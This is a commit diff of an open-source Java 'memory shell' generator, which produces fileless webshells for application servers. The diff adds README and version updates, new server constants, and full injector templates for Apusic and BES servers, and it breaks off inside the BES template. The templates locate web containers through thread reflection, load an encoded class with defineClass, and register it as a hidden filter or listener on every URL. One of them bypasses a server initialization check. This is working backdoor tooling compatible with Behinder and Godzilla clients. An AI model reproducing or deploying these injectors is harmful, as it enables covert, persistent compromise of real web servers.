15 Commits
51 changed files with 1929 additions and 134 deletions
+21
View File
@@ -0,0 +1,21 @@
MIT License
Copyright (c) 2025 pen4uin
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
+13 -9
View File
@@ -9,7 +9,7 @@
<div align="center">一款支持高度自定义的 Java 内存马生成工具</div> <div align="center">一款支持高度自定义的 Java 内存马生成工具</div>
</p> </p>
<img src="./jmg-docs/img/gui.png" width="900px" /> <img src="./jmg-docs/img/gui_250101.png" width="900px" />
<br> <br>
@@ -21,7 +21,7 @@
## 功能 ## 功能
| 中间件 | 框架 | 工具 (测试版本) | 内存马类型 | 输出格式 | 辅助模块 | | 中间件 | 框架 | 工具 (测试版本) | 内存马类型 | 输出格式 | 辅助模块 |
|-----------|---------------|------------------------------------------------------------------|---------------|------------|---------| | ------------------ | ------------- | ------------------------------------------------------------ | ------------- | ---------- | -------------- |
| Tomcat | SpringMVC | [AntSword](https://github.com/AntSwordProject/antSword) (2.1.15) | Listener | BASE64 | 专项漏洞封装 | | Tomcat | SpringMVC | [AntSword](https://github.com/AntSwordProject/antSword) (2.1.15) | Listener | BASE64 | 专项漏洞封装 |
| Resin | SpringWebFlux | [Behinder](https://github.com/rebeyond/Behinder) (4.0.7) | Filter | BCEL | 表达式语句封装 | | Resin | SpringWebFlux | [Behinder](https://github.com/rebeyond/Behinder) (4.0.7) | Filter | BCEL | 表达式语句封装 |
| WebLogic | | [Godzilla](https://github.com/BeichenDream/Godzilla) (4.0.1) | Interceptor | BIGINTEGER | | | WebLogic | | [Godzilla](https://github.com/BeichenDream/Godzilla) (4.0.1) | Interceptor | BIGINTEGER | |
@@ -29,7 +29,11 @@
| WebSphere | | [Suo5](https://github.com/zema1/suo5) (0.9.0) | TomcatValve | JAR | | | WebSphere | | [Suo5](https://github.com/zema1/suo5) (0.9.0) | TomcatValve | JAR | |
| Undertow | | Custom | | JAR_AGENT | | | Undertow | | Custom | | JAR_AGENT | |
| GlassFish | | | | JS | | | GlassFish | | | | JS | |
| | | | | JSP | | | Apusic(金蝶) | | | | JSP | |
| BES(宝兰德) | | | | | |
| InforSuite(中创) | | | | | |
| TongWeb(东方通) | | | | | |
| | | | | | |
## 编译 ## 编译
@@ -44,26 +48,26 @@ mvn package assembly:single
**图形化** **图形化**
```shell ```shell
java -jar ./releases/jmg-gui-1.0.8.jar java -jar ./releases/jmg-gui-1.0.9.jar
``` ```
**命令行** **命令行**
```shell ```shell
java -jar ./releases/jmg-cli-1.0.8.jar java -jar ./releases/jmg-cli-1.0.9.jar
``` ```
**Woodpecker 插件** **Woodpecker 插件**
将 jmg-woodpecker-1.0.8.jar 添加到 woodpecker 插件目录 将 jmg-woodpecker-1.0.9.jar 添加到 woodpecker 插件目录
**第三方库 (Maven)** **第三方库 (Maven)**
1.将 jmg-sdk-1.0.8.jar 安装到本地 maven 仓库 1.将 jmg-sdk-1.0.9.jar 安装到本地 maven 仓库
```shell ```shell
mvn install:install-file -Dfile=./releases/jmg-sdk-1.0.8.jar -DgroupId=jmg -DartifactId=jmg-sdk -Dversion=1.0.8 -Dpackaging=jar mvn install:install-file -Dfile=./releases/jmg-sdk-1.0.9.jar -DgroupId=jmg -DartifactId=jmg-sdk -Dversion=1.0.9 -Dpackaging=jar
``` ```
2.添加为依赖 2.添加为依赖
@@ -72,7 +76,7 @@ mvn install:install-file -Dfile=./releases/jmg-sdk-1.0.8.jar -DgroupId=jmg -Dart
<dependency> <dependency>
<groupId>jmg</groupId> <groupId>jmg</groupId>
<artifactId>jmg-sdk</artifactId> <artifactId>jmg-sdk</artifactId>
<version>1.0.8</version> <version>1.0.9</version>
</dependency> </dependency>
``` ```
+1 -1
View File
@@ -6,7 +6,7 @@
<parent> <parent>
<groupId>jmg</groupId> <groupId>jmg</groupId>
<artifactId>java-memshell-generator</artifactId> <artifactId>java-memshell-generator</artifactId>
<version>1.0.8</version> <version>1.0.9</version>
</parent> </parent>
<artifactId>jmg-all</artifactId> <artifactId>jmg-all</artifactId>
+1 -1
View File
@@ -4,7 +4,7 @@
<parent> <parent>
<groupId>jmg</groupId> <groupId>jmg</groupId>
<artifactId>java-memshell-generator</artifactId> <artifactId>java-memshell-generator</artifactId>
<version>1.0.8</version> <version>1.0.9</version>
</parent> </parent>
<artifactId>jmg-antsword</artifactId> <artifactId>jmg-antsword</artifactId>
+1 -1
View File
@@ -4,7 +4,7 @@
<parent> <parent>
<groupId>jmg</groupId> <groupId>jmg</groupId>
<artifactId>java-memshell-generator</artifactId> <artifactId>java-memshell-generator</artifactId>
<version>1.0.8</version> <version>1.0.9</version>
</parent> </parent>
<artifactId>jmg-behinder</artifactId> <artifactId>jmg-behinder</artifactId>
+1 -1
View File
@@ -6,7 +6,7 @@
<parent> <parent>
<groupId>jmg</groupId> <groupId>jmg</groupId>
<artifactId>java-memshell-generator</artifactId> <artifactId>java-memshell-generator</artifactId>
<version>1.0.8</version> <version>1.0.9</version>
</parent> </parent>
<artifactId>jmg-cli</artifactId> <artifactId>jmg-cli</artifactId>
+5 -1
View File
@@ -27,7 +27,11 @@ public class Console {
Constants.SERVER_WEBSPHERE, Constants.SERVER_WEBSPHERE,
Constants.SERVER_UNDERTOW, Constants.SERVER_UNDERTOW,
Constants.SERVER_GLASSFISH, Constants.SERVER_GLASSFISH,
Constants.SERVER_JBOSS); Constants.SERVER_JBOSS,
Constants.SERVER_TONGWEB,
Constants.SERVER_APUSIC,
Constants.SERVER_BES,
Constants.SERVER_INFORSUITE);
private static final List<String> TOOL_TYPES = Arrays.asList( private static final List<String> TOOL_TYPES = Arrays.asList(
Constants.TOOL_GODZILLA, Constants.TOOL_GODZILLA,
Constants.TOOL_BEHINDER, Constants.TOOL_BEHINDER,
+1 -1
View File
@@ -3,7 +3,7 @@
<parent> <parent>
<artifactId>java-memshell-generator</artifactId> <artifactId>java-memshell-generator</artifactId>
<groupId>jmg</groupId> <groupId>jmg</groupId>
<version>1.0.8</version> <version>1.0.9</version>
</parent> </parent>
<modelVersion>4.0.0</modelVersion> <modelVersion>4.0.0</modelVersion>
<artifactId>jmg-core</artifactId> <artifactId>jmg-core</artifactId>
@@ -410,6 +410,26 @@ public class AbstractConfig {
private String jarClassName; private String jarClassName;
public byte[] getBytesInLoader() {
return bytesInLoader;
}
public void setBytesInLoader(byte[] bytesInLoader) {
this.bytesInLoader = bytesInLoader;
}
private byte[] bytesInLoader;
public String getClassNameInLoader() {
return classNameInLoader;
}
public void setClassNameInLoader(String classNameInLoader) {
this.classNameInLoader = classNameInLoader;
}
private String classNameInLoader;
public void build() { public void build() {
// 检查 serverType、modelType、formatType 是否已设置 // 检查 serverType、modelType、formatType 是否已设置
if (this.toolType == null || this.serverType == null || this.shellType == null || this.outputFormat == null || this.gadgetType == null) { if (this.toolType == null || this.serverType == null || this.shellType == null || this.outputFormat == null || this.gadgetType == null) {
@@ -429,8 +449,6 @@ public class AbstractConfig {
this.setShellClassName(ClassNameUtil.getRandomShellClassName(this.getShellType())); this.setShellClassName(ClassNameUtil.getRandomShellClassName(this.getShellType()));
if (this.getShellSimpleClassName() == null) if (this.getShellSimpleClassName() == null)
this.setShellSimpleClassName(CommonUtil.getSimpleName(this.getShellClassName())); this.setShellSimpleClassName(CommonUtil.getSimpleName(this.getShellClassName()));
if (this.getOutputFormat().contains(Constants.FORMAT_BCEL))
this.setLoaderClassName(ClassNameUtil.getRandomLoaderClassName());
this.setSavePath(CommonUtil.getFileOutputPath(this.getOutputFormat(), this.getInjectorSimpleClassName(), this.getSavePath())); this.setSavePath(CommonUtil.getFileOutputPath(this.getOutputFormat(), this.getInjectorSimpleClassName(), this.getSavePath()));
} }
} }
@@ -2,7 +2,7 @@ package jmg.core.config;
public class Constants { public class Constants {
public static final String JMG_VERSION = "1.0.8_240914"; public static final String JMG_VERSION = "1.0.9_250101";
public static final String JMG_NAME = "java-memshell-generator"; public static final String JMG_NAME = "java-memshell-generator";
public static final String JMG_DESCRIPTION = "Java 内存马生成器"; public static final String JMG_DESCRIPTION = "Java 内存马生成器";
@@ -22,6 +22,11 @@ public class Constants {
public static final String SERVER_JBOSS = "JBoss"; public static final String SERVER_JBOSS = "JBoss";
public static final String SERVER_TONGWEB = "Tongweb";
public static final String SERVER_APUSIC = "Apusic";
public static final String SERVER_INFORSUITE = "InforSuite";
public static final String SERVER_BES = "BES";
public static final String SHELL_LISTENER = "Listener"; public static final String SHELL_LISTENER = "Listener";
public static final String SHELL_FILTER = "Filter"; public static final String SHELL_FILTER = "Filter";
@@ -56,7 +61,7 @@ public class Constants {
public static final String TOOL_CUSTOM = "Custom"; public static final String TOOL_CUSTOM = "Custom";
public static final String TOOL_NEOREGEORG = "Neo-reGeorg"; public static final String TOOL_NEOREGEORG = "NeoreGeorg";
public static final String TOOL_SUO5 = "Suo5"; public static final String TOOL_SUO5 = "Suo5";
public static final String EXPR_EL = "EL"; public static final String EXPR_EL = "EL";
@@ -1,6 +1,7 @@
package jmg.core.format; package jmg.core.format;
import jmg.core.config.AbstractConfig; import jmg.core.config.AbstractConfig;
import jmg.core.util.ClassNameUtil;
import me.gv7.woodpecker.bcel.HackBCELs; import me.gv7.woodpecker.bcel.HackBCELs;
import java.io.IOException; import java.io.IOException;
@@ -9,7 +10,15 @@ public class BCELFormater implements IFormater {
public byte[] transform(byte[] clazzbyte, AbstractConfig config) throws IOException { public byte[] transform(byte[] clazzbyte, AbstractConfig config) throws IOException {
// 解决 BCEL 的classloader 的问题 // 解决 BCEL ClassLoader 带来的问题
if (config.isEnabledExtender()){
config.setBytesInLoader(config.getExtenderBytes());
config.setClassNameInLoader(config.getExtenderClassName());
}else{
config.setBytesInLoader(config.getInjectorBytes());
config.setClassNameInLoader(config.getInjectorClassName());
}
config.setLoaderClassName(ClassNameUtil.getRandomLoaderClassName());
byte[] bcelClzBytes = BCELoaderGenerator.generatorBCELoaderClass(config); byte[] bcelClzBytes = BCELoaderGenerator.generatorBCELoaderClass(config);
return HackBCELs.encode(bcelClzBytes).getBytes(); return HackBCELs.encode(bcelClzBytes).getBytes();
} }
@@ -17,9 +17,9 @@ public class BCELoaderGenerator {
ctClass.setName(config.getLoaderClassName()); ctClass.setName(config.getLoaderClassName());
ctClass.getClassFile().setVersionToJava5(); ctClass.getClassFile().setVersionToJava5();
CtMethod getClassName = ctClass.getDeclaredMethod("getClassName"); CtMethod getClassName = ctClass.getDeclaredMethod("getClassName");
getClassName.setBody(String.format("{return \"%s\";}", config.getInjectorClassName())); getClassName.setBody(String.format("{return \"%s\";}", config.getClassNameInLoader()));
CtMethod getBase64String = ctClass.getDeclaredMethod("getBase64String"); CtMethod getBase64String = ctClass.getDeclaredMethod("getBase64String");
String base64ClassString = encodeToBase64(config.getInjectorBytes()).replace(System.lineSeparator(), ""); String base64ClassString = encodeToBase64(config.getBytesInLoader()).replaceAll("[\\s*\t\n\r]", "");
String[] parts = splitChunks(base64ClassString, 40000); String[] parts = splitChunks(base64ClassString, 40000);
StringBuilder result = new StringBuilder(); StringBuilder result = new StringBuilder();
for (int i = 0; i < parts.length; i++) { for (int i = 0; i < parts.length; i++) {
@@ -0,0 +1,223 @@
package jmg.core.template;
import java.io.*;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.util.ArrayList;
import java.util.List;
import java.util.zip.GZIPInputStream;
/**
* Author: pen4uin
* Tested versionApusic Enterprise Edition 9.0 SP5
*/
public class ApusicFilterInjectorTpl {
public String getUrlPattern() {
return "/*";
}
public String getClassName() {
return "";
}
public String getBase64String() throws IOException {
return "";
}
static {
new ApusicFilterInjectorTpl();
}
public ApusicFilterInjectorTpl() {
try {
List<Object> containers = getContainer();
for (Object container : containers) {
Object filter = getFilter(container);
addFilter(container, filter);
}
} catch (Exception ignored) {
}
}
public synchronized List<Object> getContainer() {
List<Object> containers = new ArrayList<Object>();
Thread[] threads = getThreads();
try {
for (Thread thread : threads) {
if (thread.getClass().getName().contains("DefaultSessionManager")) {
Object container = getFV(getFV(thread, "this$0"), "container");
if (container.getClass().getName().contains("WebContainer")) {
containers.add(container);
}
}
}
} catch (Exception ignored) {
}
return containers;
}
public Thread[] getThreads(){
Thread[] var0 = null;
try {
var0 = (Thread[])(invokeMethod(Thread.class, "getThreads"));
} catch (Exception var3) {
ThreadGroup var2 = Thread.currentThread().getThreadGroup();
var0 = new Thread[var2.activeCount()];
var2.enumerate(var0);
}
return var0;
}
private synchronized Object getFilter(Object container) throws Exception {
Object filter = null;
ClassLoader loader = (ClassLoader) invokeMethod(container, "getClassLoader");
try {
filter = loader.loadClass(getClassName()).newInstance();
} catch (Exception e) {
byte[] clazzByte = gzipDecompress(decodeBase64(getBase64String()));
Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
defineClass.setAccessible(true);
Class clazz = (Class) defineClass.invoke(loader, clazzByte, 0, clazzByte.length);
filter = clazz.newInstance();
}
return filter;
}
public void addFilter(Object container, Object filter) {
try {
String filterName = filter.getClass().getSimpleName();
String filterClassName = filter.getClass().getName();
if (isInjected(container, filterName)) {
return;
}
Object webapp = invokeMethod(container, "getWebModule");
Object filterMapping = Class.forName("com.apusic.deploy.runtime.FilterMapping").newInstance();
invokeMethod(filterMapping, "setFilterName", new Class[]{String.class}, new Object[]{filterName});
invokeMethod(filterMapping, "setUrlPattern", new Class[]{String.class}, new Object[]{getUrlPattern()});
invokeMethod(filterMapping, "setDispatcher", new Class[]{int.class}, new Object[]{2});
invokeMethod(webapp, "addBeforeFilterMapping", new Class[]{filterMapping.getClass()}, new Object[]{filterMapping});
Constructor filterModelConstructor = Class.forName("com.apusic.deploy.runtime.FilterModel").getConstructor(new Class[]{webapp.getClass()});
Object filterModel = filterModelConstructor.newInstance(new Object[]{webapp});
invokeMethod(filterModel, "setDescription", new Class[]{String.class}, new Object[]{""});
invokeMethod(filterModel, "setDisplayName", new Class[]{String.class}, new Object[]{""});
invokeMethod(filterModel, "setName", new Class[]{String.class}, new Object[]{filterName});
invokeMethod(filterModel, "setFilterClass", new Class[]{String.class}, new Object[]{filterClassName});
invokeMethod(webapp, "addFilter", new Class[]{filterModel.getClass()}, new Object[]{filterModel});
Object allFilterMappings = invokeMethod(webapp, "getAllFilterMappings");
invokeMethod(getFV(container, "filterMapper"), "populate", new Class[]{allFilterMappings.getClass()}, new Object[]{allFilterMappings});
invokeMethod(container, "loadFilters");
} catch (Exception ignored) {
}
}
public boolean isInjected(Object container, String filterName) throws Exception {
Object filter = invokeMethod(getFV(container, "webapp"), "getFilter", new Class[]{String.class}, new Object[]{filterName});
return filter != null;
}
public static byte[] decodeBase64(String base64Str) throws ClassNotFoundException, NoSuchMethodException, InvocationTargetException, IllegalAccessException {
Class<?> decoderClass;
try {
decoderClass = Class.forName("sun.misc.BASE64Decoder");
return (byte[]) decoderClass.getMethod("decodeBuffer", String.class).invoke(decoderClass.newInstance(), base64Str);
} catch (Exception ignored) {
decoderClass = Class.forName("java.util.Base64");
Object decoder = decoderClass.getMethod("getDecoder").invoke(null);
return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, base64Str);
}
}
public static byte[] gzipDecompress(byte[] compressedData) throws IOException {
ByteArrayOutputStream out = new ByteArrayOutputStream();
ByteArrayInputStream in = new ByteArrayInputStream(compressedData);
GZIPInputStream ungzip = new GZIPInputStream(in);
byte[] buffer = new byte[256];
int n;
while ((n = ungzip.read(buffer)) >= 0) {
out.write(buffer, 0, n);
}
return out.toByteArray();
}
static Object getFV(Object obj, String fieldName) throws Exception {
Field field = getF(obj, fieldName);
field.setAccessible(true);
return field.get(obj);
}
static Field getF(Object obj, String fieldName) throws NoSuchFieldException {
Class<?> clazz = obj.getClass();
while (clazz != null) {
try {
Field field = clazz.getDeclaredField(fieldName);
field.setAccessible(true);
return field;
} catch (NoSuchFieldException e) {
clazz = clazz.getSuperclass();
}
}
throw new NoSuchFieldException(fieldName);
}
static synchronized Object invokeMethod(Object targetObject, String methodName) throws Exception {
return invokeMethod(targetObject, methodName, new Class[0], new Object[0]);
}
public static synchronized Object invokeMethod(final Object obj, final String methodName, Class[] paramClazz, Object[] param) throws Exception {
Class clazz = (obj instanceof Class) ? (Class) obj : obj.getClass();
Method method = null;
Class tempClass = clazz;
while (method == null && tempClass != null) {
try {
if (paramClazz == null) {
// Get all declared methods of the class
Method[] methods = tempClass.getDeclaredMethods();
for (int i = 0; i < methods.length; i++) {
if (methods[i].getName().equals(methodName) && methods[i].getParameterTypes().length == 0) {
method = methods[i];
break;
}
}
} else {
method = tempClass.getDeclaredMethod(methodName, paramClazz);
}
} catch (NoSuchMethodException e) {
tempClass = tempClass.getSuperclass();
}
}
if (method == null) {
throw new NoSuchMethodException(methodName);
}
method.setAccessible(true);
if (obj instanceof Class) {
try {
return method.invoke(null, param);
} catch (IllegalAccessException e) {
throw new RuntimeException(e.getMessage());
}
} else {
try {
return method.invoke(obj, param);
} catch (IllegalAccessException e) {
throw new RuntimeException(e.getMessage());
}
}
}
}
@@ -0,0 +1,203 @@
package jmg.core.template;
import java.io.*;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.util.ArrayList;
import java.util.List;
import java.util.zip.GZIPInputStream;
/**
* Apusic Listener 注入器
* Author: pen4uin
* Tested versionApusic Enterprise Edition 9.0 SP5
*/
public class ApusicListenerInjectorTpl {
public String getClassName() {
return "";
}
public String getBase64String() throws IOException {
return "";
}
static {
new ApusicListenerInjectorTpl();
}
public ApusicListenerInjectorTpl() {
try {
List<Object> containers = getContainer();
for (Object container : containers) {
Object listener = getListener(container);
addListener(container, listener);
}
} catch (Exception ignored) {
}
}
public List<Object> getContainer() throws Exception {
List<Object> containers = new ArrayList<Object>();
Thread[] threads = getThreads();
try {
for (Thread thread : threads) {
if (thread.getClass().getName().contains("DefaultSessionManager")) {
Object container = getFV(getFV(thread, "this$0"), "container");
if (container.getClass().getName().contains("WebContainer")) {
containers.add(container);
}
}
}
} catch (Exception ignored) {
}
return containers;
}
public Thread[] getThreads(){
Thread[] var0 = null;
try {
var0 = (Thread[])(invokeMethod(Thread.class, "getThreads"));
} catch (Exception var3) {
ThreadGroup var2 = Thread.currentThread().getThreadGroup();
var0 = new Thread[var2.activeCount()];
var2.enumerate(var0);
}
return var0;
}
private Object getListener(Object container) throws Exception {
Object listener = null;
ClassLoader loader = (ClassLoader) invokeMethod(container, "getClassLoader");
try {
listener = loader.loadClass(getClassName()).newInstance();
} catch (Exception e) {
byte[] clazzByte = gzipDecompress(decodeBase64(getBase64String()));
Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
defineClass.setAccessible(true);
Class clazz = (Class) defineClass.invoke(loader, clazzByte, 0, clazzByte.length);
listener = clazz.newInstance();
}
return listener;
}
void addListener(Object container, Object listener) throws Exception {
if (isInjected(container, listener.getClass().getName())) {
return;
}
// bypass com.apusic.web.container.WebContainer.checkContextInitialized()
setFV(container, "contextInitialized", false);
invokeMethod(container, "addListener", new Class[]{Class.class}, new Object[]{listener.getClass()});
// recover com.apusic.web.container.WebContainer.contextInitialized
setFV(container, "contextInitialized", true);
}
boolean isInjected(Object container, String listenerName) throws Exception {
Object flag = invokeMethod(getFV(container, "webapp"), "hasListener", new Class[]{String.class}, new Object[]{listenerName});
return Boolean.parseBoolean(flag.toString());
}
static byte[] decodeBase64(String base64Str) throws ClassNotFoundException, NoSuchMethodException, InvocationTargetException, IllegalAccessException {
Class<?> decoderClass;
try {
decoderClass = Class.forName("sun.misc.BASE64Decoder");
return (byte[]) decoderClass.getMethod("decodeBuffer", String.class).invoke(decoderClass.newInstance(), base64Str);
} catch (Exception ignored) {
decoderClass = Class.forName("java.util.Base64");
Object decoder = decoderClass.getMethod("getDecoder").invoke(null);
return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, base64Str);
}
}
public static byte[] gzipDecompress(byte[] compressedData) throws IOException {
ByteArrayOutputStream out = new ByteArrayOutputStream();
ByteArrayInputStream in = new ByteArrayInputStream(compressedData);
GZIPInputStream ungzip = new GZIPInputStream(in);
byte[] buffer = new byte[256];
int n;
while ((n = ungzip.read(buffer)) >= 0) {
out.write(buffer, 0, n);
}
return out.toByteArray();
}
synchronized void setFV(Object var0, String var1, Object val) throws Exception {
getF(var0, var1).set(var0, val);
}
static Object getFV(Object obj, String fieldName) throws Exception {
Field field = getF(obj, fieldName);
field.setAccessible(true);
return field.get(obj);
}
static Field getF(Object obj, String fieldName) throws NoSuchFieldException {
Class<?> clazz = obj.getClass();
while (clazz != null) {
try {
Field field = clazz.getDeclaredField(fieldName);
field.setAccessible(true);
return field;
} catch (NoSuchFieldException e) {
clazz = clazz.getSuperclass();
}
}
throw new NoSuchFieldException(fieldName);
}
static synchronized Object invokeMethod(Object targetObject, String methodName) throws Exception {
return invokeMethod(targetObject, methodName, new Class[0], new Object[0]);
}
public static synchronized Object invokeMethod(final Object obj, final String methodName, Class[] paramClazz, Object[] param) throws Exception {
Class clazz = (obj instanceof Class) ? (Class) obj : obj.getClass();
Method method = null;
Class tempClass = clazz;
while (method == null && tempClass != null) {
try {
if (paramClazz == null) {
// Get all declared methods of the class
Method[] methods = tempClass.getDeclaredMethods();
for (int i = 0; i < methods.length; i++) {
if (methods[i].getName().equals(methodName) && methods[i].getParameterTypes().length == 0) {
method = methods[i];
break;
}
}
} else {
method = tempClass.getDeclaredMethod(methodName, paramClazz);
}
} catch (NoSuchMethodException e) {
tempClass = tempClass.getSuperclass();
}
}
if (method == null) {
throw new NoSuchMethodException(methodName);
}
method.setAccessible(true);
if (obj instanceof Class) {
try {
return method.invoke(null, param);
} catch (IllegalAccessException e) {
throw new RuntimeException(e.getMessage());
}
} else {
try {
return method.invoke(obj, param);
} catch (IllegalAccessException e) {
throw new RuntimeException(e.getMessage());
}
}
}
}
@@ -0,0 +1,264 @@
package jmg.core.template;
import java.io.*;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import java.util.zip.GZIPInputStream;
public class BESFilterInjectorTpl {
public String getUrlPattern() {
return "/*";
}
public String getClassName() {
return "";
}
public String getBase64String() throws IOException {
return "";
}
static {
new BESFilterInjectorTpl();
}
public BESFilterInjectorTpl() {
try {
List<Object> contexts = getContext();
for (Object context : contexts) {
Object filter = getFilter(context);
addFilter(context, filter);
}
} catch (Exception ignored) {
}
}
public List<Object> getContext() throws IllegalAccessException, NoSuchMethodException, InvocationTargetException {
List<Object> contexts = new ArrayList();
Thread[] threads = getThreads();
try {
for (Thread thread : threads) {
if (thread.getName().contains("ContainerBackgroundProcessor")) {
HashMap childrenMap = (HashMap) getFV(getFV(getFV(thread, "target"), "this$0"), "children");
for (Object key : childrenMap.keySet()) {
HashMap children = (HashMap) getFV(childrenMap.get(key), "children");
for (Object key1 : children.keySet()) {
Object context = children.get(key1);
if (context != null) contexts.add(context);
}
}
}
}
} catch (Exception ignored) {
}
return contexts;
}
public Thread[] getThreads() {
Thread[] var0 = null;
try {
var0 = (Thread[]) (invokeMethod(Thread.class, "getThreads"));
} catch (NoSuchMethodException | InvocationTargetException | IllegalAccessException var3) {
ThreadGroup var2 = Thread.currentThread().getThreadGroup();
var0 = new Thread[var2.activeCount()];
var2.enumerate(var0);
}
return var0;
}
private ClassLoader getWebAppClassLoader(Object context) throws Exception {
try {
return ((ClassLoader) invokeMethod(context, "getClassLoader", null, null));
} catch (Exception e) {
Object loader = invokeMethod(context, "getLoader", null, null);
return ((ClassLoader) invokeMethod(loader, "getClassLoader", null, null));
}
}
private Object getFilter(Object context) throws Exception {
Object filter = null;
ClassLoader classLoader = getWebAppClassLoader(context);
try {
filter = classLoader.loadClass(getClassName()).newInstance();
} catch (Exception e1) {
try {
byte[] clazzByte = gzipDecompress(decodeBase64(getBase64String()));
Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
defineClass.setAccessible(true);
Class clazz = (Class) defineClass.invoke(classLoader, clazzByte, 0, clazzByte.length);
filter = clazz.newInstance();
} catch (Exception ignored) {
}
}
return filter;
}
public void addFilter(Object context, Object filter) throws Exception {
String filterName = filter.getClass().getSimpleName();
if (isInjected(context, filterName)) {
return;
}
try {
Object filterDef;
Object filterMap;
try {
filterDef = Class.forName("org.apache.tomcat.util.descriptor.web.FilterDef").newInstance();
filterMap = Class.forName("org.apache.tomcat.util.descriptor.web.FilterMap").newInstance();
} catch (Exception e2) {
try {
filterDef = Class.forName("com.bes.enterprise.util.descriptor.web.FilterDef").newInstance();
filterMap = Class.forName("com.bes.enterprise.util.descriptor.web.FilterMap").newInstance();
} catch (Exception e3) {
filterDef = Class.forName("com.bes.enterprise.web.util.descriptor.web.FilterDef").newInstance();
filterMap = Class.forName("com.bes.enterprise.web.util.descriptor.web.FilterMap").newInstance();
}
}
invokeMethod(filterDef, "setFilterName", new Class[]{String.class}, new Object[]{filterName});
invokeMethod(filterDef, "setFilterClass", new Class[]{String.class}, new Object[]{getClassName()});
invokeMethod(context, "addFilterDef", new Class[]{filterDef.getClass()}, new Object[]{filterDef});
invokeMethod(filterMap, "setFilterName", new Class[]{String.class}, new Object[]{filterName});
invokeMethod(filterMap, "setDispatcher", new Class[]{String.class}, new Object[]{"REQUEST"});
invokeMethod(filterMap, "addURLPattern", new Class[]{String.class}, new Object[]{getUrlPattern()});
Constructor<?>[] constructors;
try {
constructors = Class.forName("org.apache.catalina.core.ApplicationFilterConfig").getDeclaredConstructors();
} catch (Exception e) {
constructors = Class.forName("com.bes.enterprise.webtier.core.ApplicationFilterConfig").getDeclaredConstructors();
}
try {
invokeMethod(context, "addFilterMapBefore", new Class[]{filterMap.getClass()}, new Object[]{filterMap});
} catch (Exception e) {
invokeMethod(context, "addFilterMap", new Class[]{filterMap.getClass()}, new Object[]{filterMap});
}
constructors[0].setAccessible(true);
Object filterConfig = constructors[0].newInstance(context, filterDef);
Map filterConfigs = (Map) getFV(context, "filterConfigs");
filterConfigs.put(filterName, filterConfig);
} catch (Exception ignored) {
}
}
public boolean isInjected(Object context, String filterName) throws Exception {
Map filterConfigs = (Map) getFV(context, "filterConfigs");
for (Object key : filterConfigs.keySet()) {
if (key.toString().contains(filterName)) {
return true;
}
}
return false;
}
static byte[] decodeBase64(String base64Str) throws ClassNotFoundException, NoSuchMethodException, InvocationTargetException, IllegalAccessException {
Class<?> decoderClass;
try {
decoderClass = Class.forName("sun.misc.BASE64Decoder");
return (byte[]) decoderClass.getMethod("decodeBuffer", String.class).invoke(decoderClass.newInstance(), base64Str);
} catch (Exception ignored) {
decoderClass = Class.forName("java.util.Base64");
Object decoder = decoderClass.getMethod("getDecoder").invoke(null);
return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, base64Str);
}
}
public static byte[] gzipDecompress(byte[] compressedData) throws IOException {
ByteArrayOutputStream out = new ByteArrayOutputStream();
ByteArrayInputStream in = new ByteArrayInputStream(compressedData);
GZIPInputStream ungzip = new GZIPInputStream(in);
byte[] buffer = new byte[256];
int n;
while ((n = ungzip.read(buffer)) >= 0) {
out.write(buffer, 0, n);
}
return out.toByteArray();
}
synchronized void setFV(Object var0, String var1, Object val) throws Exception {
getF(var0, var1).set(var0, val);
}
static Object getFV(Object obj, String fieldName) throws Exception {
Field field = getF(obj, fieldName);
field.setAccessible(true);
return field.get(obj);
}
static Field getF(Object obj, String fieldName) throws NoSuchFieldException {
Class<?> clazz = obj.getClass();
while (clazz != null) {
try {
Field field = clazz.getDeclaredField(fieldName);
field.setAccessible(true);
return field;
} catch (NoSuchFieldException e) {
clazz = clazz.getSuperclass();
}
}
throw new NoSuchFieldException(fieldName);
}
static synchronized Object invokeMethod(Object targetObject, String methodName) throws NoSuchMethodException, IllegalAccessException, InvocationTargetException {
return invokeMethod(targetObject, methodName, new Class[0], new Object[0]);
}
public static synchronized Object invokeMethod(final Object obj, final String methodName, Class[] paramClazz, Object[] param) throws NoSuchMethodException, InvocationTargetException, IllegalAccessException {
Class clazz = (obj instanceof Class) ? (Class) obj : obj.getClass();
Method method = null;
Class tempClass = clazz;
while (method == null && tempClass != null) {
try {
if (paramClazz == null) {
// Get all declared methods of the class
Method[] methods = tempClass.getDeclaredMethods();
for (int i = 0; i < methods.length; i++) {
if (methods[i].getName().equals(methodName) && methods[i].getParameterTypes().length == 0) {
method = methods[i];
break;
}
}
} else {
method = tempClass.getDeclaredMethod(methodName, paramClazz);
}
} catch (NoSuchMethodException e) {
tempClass = tempClass.getSuperclass();
}
}
if (method == null) {
throw new NoSuchMethodException(methodName);
}
method.setAccessible(true);
if (obj instanceof Class) {
try {
return method.invoke(null, param);
} catch (IllegalAccessException e) {
